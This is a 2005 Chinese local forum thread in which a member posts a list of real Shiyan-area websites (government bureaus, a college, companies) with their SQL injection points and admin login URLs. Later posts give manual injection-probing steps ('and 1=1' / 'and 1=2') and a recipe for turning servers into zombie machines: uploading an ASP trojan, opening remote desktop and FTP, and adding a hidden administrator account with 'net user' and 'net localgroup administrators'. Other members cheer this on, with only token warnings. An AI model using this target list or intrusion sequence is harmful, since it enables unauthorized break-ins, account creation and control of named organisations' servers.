[时尚生活] 十堰网页漏洞地址和站点

[复制链接]

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
发表于 2005-5-3 04:32:31 | 显示全部楼层 |阅读模式

马上注册,结交更多郧西好友

您需要 登录 才可以下载或查看,没有帐号?注册

x
http://wwwsyeolcom/qyml/searchasp?sortid=1
管理员登陆入口
http://wwwsyeolcom/qyml//admin/loginasp
这就是你所谓的网页吗
                                          小小菜鸟: 苦咖啡
十堰银河星科技有限公司
http://wwwsyyhxcomcn/adminloginasp
注入点
http://wwwsyyhxcomcn/ShowArticleasp?classid=49&ArticleID=122
http://wwwsyjmgovcn/NewsClass2asp?ClassID=4 and 1=1
管理入口:http://wwwsyjmgovcn/adminadm存在表名:admin
管理入口:http://wwwsyjmgovcn/adminloginasp存在这个URL
管理入口:http://wwwsyjmgovcn/adminloginasp存在这个URL


郧阳师专
http://wwwyytcnetcn/news/xcb/adminloginasp
http://wwwyytcnetcn/news/xcb/newstxt/dbm6asp
注入点
http://wwwyytcnetcn/news/xcb/shownewsasp?NewsID=1028 and 1=1


十堰政务网
SQL注入点
http://wwwwddjnet/ztmoreasp?st=77


十堰科器
注入点
http://wwwke-qicom/shownewsasp?newsid=107
http://wwwsyjmgovcn/topiclistasp?topicid=11

湖北万联达汔车公司
http://wwwhbwldcomcn/ShowArticleasp?classid=2&ArticleID=21
http://wwwhbwldcomcn/showclassasp?classid=3

管理入口: http://wwwhbwldcomcn/uploadasp
管理入口: http://wwwhbwldcomcn/adminloginasp
http://wwwhbwldcomcn/AdminAdminasp

汔配城
注入点
http://wwwqpcitycomcn/card/cardasp?id=1

管理入口: http://wwwqpcitycomcn/card/adminasp
管理入口: http://wwwqpcitycomcn/card/connasp
管理入口: http://wwwqpcitycomcn/card/AdminLoginasp
管理入口: http://wwwqpcitycomcn/card/admindelasp
管理入口: http://wwwqpcitycomcn/card/adminloginasp
管理入口: http://wwwqpcitycomcn/card/adminloginasp


张湾财政局
http://wwwzwczgovcn/ShowClassasp?classid=85
http://wwwzwczgovcn/jgasp?classid=87

我看了一下十堰的网页,漏洞多的我都不想说了,相信会asp的人一看都知道这是什么意思

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-3 04:36:07 | 显示全部楼层
支持你啊,兄弟但是不可以害人啊

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-3 04:40:40 | 显示全部楼层
我只不过喜欢网络安全但我有自己的原则

619

主题

6970

帖子

6973

积分

论坛创始人

游不走的鱼

Rank: 9Rank: 9Rank: 9

积分
6973

管理员

QQ
发表于 2005-5-3 05:33:17 | 显示全部楼层
看来你是个人才哦!
好好利用自己的聪明
以后才能有所做为!

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-3 05:43:32 | 显示全部楼层
我只不过是喜欢网络安全,自己看的书多了就OK了不过今天也是在网上找一些有漏洞的网页和论坛才发现原来老家也有一个自己的BBS然后就在上面玩了

619

主题

6970

帖子

6973

积分

论坛创始人

游不走的鱼

Rank: 9Rank: 9Rank: 9

积分
6973

管理员

QQ
发表于 2005-5-3 06:44:58 | 显示全部楼层
[audio07]

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-3 07:19:40 | 显示全部楼层
恩,你技术很高把,有什么好东西都给我们介绍介绍啊

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-3 07:26:26 | 显示全部楼层
我~~~~
别提了很菜的

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-3 12:04:35 | 显示全部楼层
原来你也是菜啊,说了鬼信的呢

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-3 13:54:32 | 显示全部楼层
我都是买很多书然后看很多的服务器安全
没事的时候跑到网上去学着弄弄
这些其实是很简单的

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-3 18:41:36 | 显示全部楼层
哦知道了

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-4 08:57:22 | 显示全部楼层
这些网页都是SQL注入漏洞改天我在弄一些php注入的给大家看看

619

主题

6970

帖子

6973

积分

论坛创始人

游不走的鱼

Rank: 9Rank: 9Rank: 9

积分
6973

管理员

QQ
发表于 2005-5-4 08:58:09 | 显示全部楼层
可以啊
但是你也不要害人哦!

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-4 08:58:59 | 显示全部楼层
呵呵,昨天晚上我找别的网站漏洞找到了哈哈,笑!~

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-4 09:04:40 | 显示全部楼层
如果你想看一个网页有洞有SQL注入漏洞
1  选在后面加了'看返回的错误代码,注意一写要把IE设成显示好友错误才可以
2  在在后面加了 and 1=1这时页面是正常
3  在后面在重新加上and 1=2这时也是错误显示才对
记注每一次加完以后,回复到原始地址在加,不是在加过的后面在加
这是最简单手动查找SQL注入漏洞的方法

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-4 09:06:46 | 显示全部楼层
谢谢知道了

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-4 09:09:12 | 显示全部楼层
共同进步是我的原则

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-4 09:15:03 | 显示全部楼层
菜中菜就是厉害呢

33

主题

338

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2005-5-4 09:15:26 | 显示全部楼层
对啊,谢谢你给大家提供资料啊

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
 楼主| 发表于 2005-5-4 09:30:35 | 显示全部楼层
没什么大家没事可以自己去网上找一下用我说的方法去可以拿很很多的肉鸡,只要你上传了ASP木马然后在上传一个开3389和FTP木马,用net user 用户名  密码  /add
然后在用net localgroup administrators 你刚设的用户名 /add就可以把自己的权限提升到管理员权限了
然后用net user 用户名 查看一下自己是不是administrators管理组了
然后去下一个远程屏幕连接工具就这样轻松搞定一台肉鸡了并且还是服务器的肉鸡哦

发表回复

您需要登录后才可以回帖 登录 | 注册

本版积分规则

郧西论坛微信公众号

QQ|小黑屋|手机版|Archiver|郧西论坛 ( 鄂ICP备10019607号-5 )客服微信yxlt365

鄂公网安备 42030202000115号

GMT+8, 2024-3-29 17:26

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表